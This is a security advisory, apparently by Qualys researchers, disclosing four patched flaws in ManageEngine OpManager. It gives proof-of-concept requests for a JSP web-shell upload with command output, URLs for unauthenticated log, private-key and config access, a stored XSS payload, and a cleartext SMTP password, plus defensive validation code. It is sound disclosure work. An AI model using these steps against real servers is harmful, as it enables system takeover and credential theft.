Manage Engine OpManager Multiple Security Vulnerabilities 


SYSTEMS AFFECTED: 
Build version 12200 


Reference: https://www.manageengine.com/ 


The Qualys Application Security and Research (QUASAR) team routinely performs security assessments 
of various products. During a recent assessment of ManageEngine OPManager (Build version 12200), 
my team discovered multiple vulnerabilities affecting the product. They were reported to ManageEngine 
and have been confirmed as patched in the latest version. 


Below is a detailed outline of the vulnerabilities that were discovered. 
Vulnerability #1: Unrestricted File/Web Shell Upload. 


The OPManager group chat functionality, shown in the snapshots below, allows users to upload files to the 
chat. The upload functionality does not enforce any restriction on the types of files that are uploaded, 
which allows users to upload web shells. Since the application runs as SYSTEM on a Windows box and as 
root on a Linux machine, any code execution obtained this way runs with the highest privilege, which 
makes this a critical vulnerability. The details of the exploitation are outlined below. 


URL: http://<ip>/apiclient/ember/index.jsp#/ITPlus 


Risk factor: Critical 
Proof of Concept: 


1. Login into the application. Directly go to the following URL 
http://<ip>/apiclient/ember/index.jsp#/ITPlus or click on the chat icon from the dashboard. 


[Screenshot: the OpManager Group Chat page, showing the "Attach Files" option and the group "test" under My Groups] 


2. Attach any jsp file or jsp web shell using the “attach files” functionality. 


POST /api/json/dashboard/addPost?apikey=<api-key>&groupID=0 HTTP/1.1 
Host: localhost:88 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
Accept: */* 
Accept-Language: en-GB,en;q=0.5 
Accept-Encoding: gzip, deflate 
X-Requested-With: XMLHttpRequest 
Referer: http://localhost:88/apiclient/ember/index.jsp 
Content-Length: 349 
Content-Type: multipart/form-data; boundary=58093196614932 
Cookie: domainNameForAutomaticSignin=Authenticator; authrule_name=Authenticator; encryptPassForAutomaticSignin=d7963B4t; userNameForAutomaticSignin=admin; signInAutomatically=true; NFA_SSO=SCEEFA02385CC3149D811743468923B8 
Connection: close 

--58093196614932 
Content-Disposition: form-data; name="post" 

Jsp file is being uploaded 
--58093196614932 
Content-Disposition: form-data; name="[object HTMLInputElement]"; filename="<file>.jsp" 
Content-Type: application/octet-stream 

[JSP shell code: the uploaded file begins with the license header of the "jsp File browser 1.2" tool] 
jsp File browser 1.2 
Copyright (C) 2003-2006 Boris von Loesch 
This program is free software; you can redistribute it and/or modify it under 
the terms of the GNU General Public License as published by the 
Free Software Foundation; either version 2 of the License, or (at your option) 
any later version. 
This program is distributed in the hope that it will be useful, but 
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
You should have received a copy of the GNU General Public License along with 
this program; if not, write to the 
Free Software Foundation, Inc., 
59 Temple Place, Suite 330, 


3. The given file gets uploaded. 


[Screenshot: the Group Chat page at http://localhost:88/apiclient/ember/index.jsp#/ITPlus after the upload; the web shell appears as an attachment posted by admin in group "test" at 2016-12-16 12:12:20] 


4. On successful upload, the file can be accessed by simply clicking on it. If a jsp web shell was 
uploaded, the file is executed with admin access. 


[Screenshot: output of the uploaded JSP web shell] 

Executing: dir 

a.log 
hiberfil.sys 
pagefile.sys 

Executing: cmd.exe 

Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 

C:\> 
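As an added example (not OpManager's code), the server-side checks the addPost upload handler above lacks: an extension allowlist applied to every dotted segment of the name, a blocklist of container-executable types, a content check for JSP markup, and storage under a random name outside the web root. The allowlist, blocklist and upload directory are assumed values.

```python
import os
import re
import secrets

# Constructed allowlist of attachment types a chat might legitimately need.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "log", "csv", "zip"}
# Types a servlet container or the host OS would execute; never accepted, even as an inner extension.
BLOCKED_EXTENSIONS = {"jsp", "jspx", "jspf", "jsw", "jsv", "war", "jar", "class", "sh", "bat", "exe", "dll"}
MAX_BYTES = 10 * 1024 * 1024
UPLOAD_DIR = "/var/lib/chat-uploads"  # assumed: a directory outside the web root

class UploadRejected(ValueError):
    """Raised for any attachment that fails validation."""

def validate_attachment(filename: str, data: bytes) -> str:
    """Validate a chat attachment and return the random path it should be stored under."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("attachment too large")
    # Drop any directory part the client sent, e.g. ..\..\webapps\ROOT\x.jsp
    base = os.path.basename(filename.replace("\\", "/")).strip()
    if base in ("", ".", ".."):
        raise UploadRejected("empty file name")
    # Look at every extension-like token: shell.jsp.png and shell.jsp;.png both carry "jsp".
    tokens = re.split(r"[.;]", base.lower())
    exts = [t for t in tokens[1:] if t]
    if not exts:
        raise UploadRejected("no extension")
    if any(e in BLOCKED_EXTENSIONS for e in exts):
        raise UploadRejected("executable file type")
    if exts[-1] not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension .{exts[-1]} not allowed")
    # Content check: a JSP renamed to .txt must not be stored where it could later be served as code.
    head = data[:4096]
    if b"<%" in head or b"<jsp:" in head.lower():
        raise UploadRejected("content contains JSP markup")
    # Never reuse the client-chosen name; a random name defeats path and name tricks entirely.
    return os.path.join(UPLOAD_DIR, f"{secrets.token_hex(16)}.{exts[-1]}")

def is_accepted(filename: str, data: bytes) -> bool:
    """Convenience wrapper for callers that only need a yes/no answer."""
    try:
        validate_attachment(filename, data)
        return True
    except UploadRejected:
        return False
```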


Vulnerability #2: Unauthenticated File Access. 


The OPManager application does not enforce any permission checks on various sensitive directories and files, 
which allows any unauthenticated user to access sensitive logs, configuration files, private keys, etc. These files 
contain sensitive information that can allow an attacker to gain admin access to OPManager. 


Risk factor: Critical 


Proof of concept: 


1. From any browser, access http://<ip>/logs/access_log.txt. This file reveals all the access details, 
most importantly the api-key. Using the api-key, the user can fetch critical information. 


[Screenshot: unauthenticated request to http://10.113.195.174/logs/access_log.txt] 

10.113.14.200 - admin [12/Sep/2016:06:36:04 +0530] "GET /api/json/admin/getSystemPerformanceStatus?apiKey=a4eaddfaa32574f162de0118c0652a4b&... HTTP/1.1" 200 257 
10.113.14.200 - admin [12/Sep/2016:06:36:06 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/jquery-ui/images/ui-bg_flat_100_ffffff_40x100.png HTTP/1.1" ... 
10.113.14.200 - admin [12/Sep/2016:06:36:06 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/jquery-ui/images/ui-icons_222222_256x240.png HTTP/1.1" ... 
10.113.14.200 - admin [12/Sep/2016:06:36:06 +0530] "GET /PNSHandler HTTP/1.1" 101 - 
10.113.14.200 - admin [12/Sep/2016:06:38:28 +0530] "GET /logs/access_log.txt HTTP/1.1" ... 
10.113.14.200 - admin [12/Sep/2016:06:39:05 +0530] "POST /api/json/admin/SubmitQuery?apiKey=a4eaddfaa32574f162de0118c0652a4b HTTP/1.1" 200 134 
(the SubmitQuery line, with the same apiKey, repeats several times) 


Unauthenticated access to the access_log.txt file. This file reveals the api-key, which is highlighted in the 
above image. 
2. Unauthenticated access to private keys. These can be accessed from 
http://<ip>/bin/.ssh_host_dsa_key and http://<ip>/bin/.ssh_host_rsa_key. 


[Screenshot: the private key served without authentication from http://10.113.195.174/bin/.ssh_host_rsa_key; key material omitted] 




3. Also, many configuration xml files are accessible without authentication. The image below shows the 
server configuration located at http://<ip>/server_xml_bkp/server.xml. 


[Screenshot: http://localhost:88/server_xml_bkp/server.xml] 


<!-- Tomcat Root Context --> 
<Context debug="0" docBase="${server.home}" path="" reloadable="true" sessionCookiePath="/"></Context> 
<Context debug="0" docBase="${server.home}/SPMHistory" path="/SPMHistory"> 
  <Manager className="org.apache.catalina.session.PersistentManager" debug="0" maxActiveSessions="-1" maxIdleBackup="-1" maxIdleSwap="-1" minIdleSwap="-1" saveOnRestart="false"> 
    <Store className="org.apache.catalina.session.FileStore"/> 
  </Manager> 
</Context> 
<Context debug="0" docBase="${server.home}/IPAMPublish" path="/IPAMPublish"> 
  <Manager className="org.apache.catalina.session.PersistentManager" debug="0" maxActiveSessions="-1" maxIdleBackup="-1" maxIdleSwap="-1" minIdleSwap="-1" saveOnRestart="false"> 
    <Store className="org.apache.catalina.session.FileStore"/> 
  </Manager> 
</Context> 
<Context debug="0" docBase="${server.home}/ScheduledReport" path="/ScheduledReport"> 
  <Manager className="org.apache.catalina.session.PersistentManager" debug="0" maxActiveSessions="-1" maxIdleBackup="-1" maxIdleSwap="-1" minIdleSwap="-1" saveOnRestart="false"> 
    <Store className="org.apache.catalina.session.FileStore"/> 
  </Manager> 
</Context> 
<Context debug="0" docBase="${server.home}/conf/LoggedOnUser" path="/LoggedOnUser"> 
  <Manager className="org.apache.catalina.session.PersistentManager" debug="0" maxActiveSessions="-1" maxIdleBackup="-1" maxIdleSwap="-1" minIdleSwap="-1" saveOnRestart="false"> 
    <Store className="org.apache.catalina.session.FileStore"/> 
  </Manager> 
... 


As shown in the first step, the user can obtain the api-key from the access_log file. Using that api-key, 
the user can fetch information directly. Even after the user logs out, the api-key remains active and 
information can still be fetched. Please refer to the image below. 


[Screenshot: an API call to 10.113.195.174 made with the api-key after logging out; the response is truncated in the capture] 

...:"1","requiresauth":"true","mailusername":"test","mailserverport":"25","securemode":"false","tlsMode":"false","mailservername":"10.10.10.10","timeout":"3","mai...,"fromemailid":"test@test.com","emailid":"test@test.com"}} 


The user can fetch information about the SMTP server, which includes sensitive details such as its IP 
and password. This vulnerability affects all API calls. 


Vulnerability #3: Stored XSS. 


OPManager does not HTML-encode data taken from the access logs, which allows an attacker to place an arbitrary 
payload in an HTTP GET request that is later displayed back to the admin user via the access_log records. Exploiting 
this vulnerability allows an attacker to conduct an XSS attack against the victim. 


Risk factor: High 
Proof of concept: 


1. Try to access any URL of the form http://<ip>/<xss payload>. 


GET /<img src=z onerror=alert(1)> HTTP/1.1 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-GB,en;q=0.5 
Accept-Encoding: gzip, deflate 
Cookie: domainNameForAutomaticSignin=Authenticator; authrule_name=Authenticator; JSESSIONID=SLO3SEF7EBABID421FDS345S7B33EE84; f2RedirectUrl=null; encryptPassForAutomaticSignin=d7963B4t; userNameForAutomaticSignin=admin; signInAutomatically=true; NFA_SSO=FDOUEI4EDGECDE6805544B4799ACEDBA3D 
Connection: close 
Upgrade-Insecure-Requests: 1 


2. Now go to the logs page http://<ip>/apiclient/ember/index.jsp#/ViewLogs/access_log.txt. The script 
executes here. 


[Screenshot: http://10.113.195.174/apiclient/ember/index.jsp#/ViewLogs/access_log.txt, the log viewer page] 

access_log.txt 

10.113.14.200 - - [12/Sep/2016:06:35:49 +0530] "GET [rendered <img> payload] HTTP/1.1" 505 - 
10.113.14.200 - admin [12/Sep/2016:06:35:53 +0530] "GET /apiclient/ember/index.jsp HTTP/1.1" 200 13387 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/ui.jqgrid.css HTTP/1.1" 304 - 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/normalize.css HTTP/1.1" 304 - 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/reset.css HTTP/1.1" 304 - 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/plugins/style.css HTTP/1.1" 304 - 
10.113.14.200 - admin [12/Sep/2016:06:35:54 +0530] "GET /apiclient/fluidicv2/styles/css/structure.min.css HTTP/1.1" 304 - 

[Browser inspector view of the log viewer DOM: the injected tag is inserted unencoded into the <pre> element] 

<div id="viewLog" style="width: 1256px;"> 
  <div id="logName" class="title">access_log.txt</div> 
  <br> 
  <div style="width: 160%;"> 
    <pre id="loadFile" class="apiClientDefaultFont"> 
      10.113.14.200 - - [12/Sep/2016:06:35:49 +0530] "GET / 
      <img src="z" onerror="alert(1)"></img> 
      HTTP/1.1" 505 - 10.113.14.200 - admin [12/Sep/201... 


Vulnerability #4: Password received in clear text in response. 


The OPManager application has a feature for configuring mail services, in which a user must enter the details of 
the SMTP server. It was noticed that the password is returned in clear text in the response. Ideally a password 
should never be sent back in clear text: it should either not be sent at all or be masked. 


RISK FACTOR: Low 


Reproduction Steps: 


1. For the request http://<ip>/api/json/admin/GetMailServerSettings?apiKey=<api-key>, 
the password for the SMTP mail server is returned in clear text. 


[Screenshot: http://10.113.195.174/api/json/admin/GetMailServerSettings?apiKey=... with the response shown below] 

{"primary":{"settingsId":"1","requiresauth":"true","mailusername":"test","mailserverport":"25","securemode":"false","tlsMode":"false","mailservername":"10.10.10.10","timeout":"3","mailpassword":"testpasword","fromemailid":"test@test.com","emailid":"test@test.com"}} 
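As an added example (not OpManager's code), the masking the advisory asks for, applied to a stand-in for the GetMailServerSettings response above, together with the edge case masking introduces: when the UI posts the masked form back, the server must treat the mask as "unchanged" rather than overwrite the stored password with asterisks. The stored settings and the key-name patterns are assumed values.

```python
import copy

# Key fragments that mark a field as secret; matched case-insensitively on the key name.
SECRET_KEY_PARTS = ("password", "passwd", "secret", "apikey", "token")
MASK = "********"

def is_secret_key(key: str) -> bool:
    k = key.lower()
    return any(part in k for part in SECRET_KEY_PARTS)

def mask_secrets(obj):
    """Deep-copy obj, replacing every non-empty secret field with MASK.
    The key is kept so the UI can still tell that a password is configured."""
    if isinstance(obj, dict):
        return {k: (MASK if is_secret_key(k) and v not in ("", None) else mask_secrets(v))
                for k, v in obj.items()}
    if isinstance(obj, list):
        return [mask_secrets(v) for v in obj]
    return copy.deepcopy(obj)

def merge_update(stored: dict, submitted: dict) -> dict:
    """Apply a settings update coming back from the UI: a masked secret means 'unchanged',
    so round-tripping the masked form never replaces the real password with asterisks."""
    merged = dict(stored)
    for k, v in submitted.items():
        if is_secret_key(k) and v == MASK:
            continue
        merged[k] = v
    return merged

# Constructed stand-in for the GetMailServerSettings response shown above (values made up).
STORED_SETTINGS = {"primary": {
    "settingsId": "1", "requiresauth": "true", "mailusername": "test",
    "mailserverport": "25", "securemode": "false", "tlsMode": "false",
    "mailservername": "10.10.10.10", "timeout": "3", "mailpassword": "testpasword",
    "fromemailid": "test@test.com", "emailid": "test@test.com"}}

def get_mail_server_settings() -> dict:
    """What the endpoint should return: the same document with the password masked."""
    return mask_secrets(STORED_SETTINGS)
```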


ManageEngine accepted the reported issues and was quick to patch them. The vendor has 
already pushed a security update that addresses these issues. To confirm that you are using the latest patched 
version of ManageEngine, kindly contact ManageEngine Support 
(https://www.manageengine.com/support.html). 


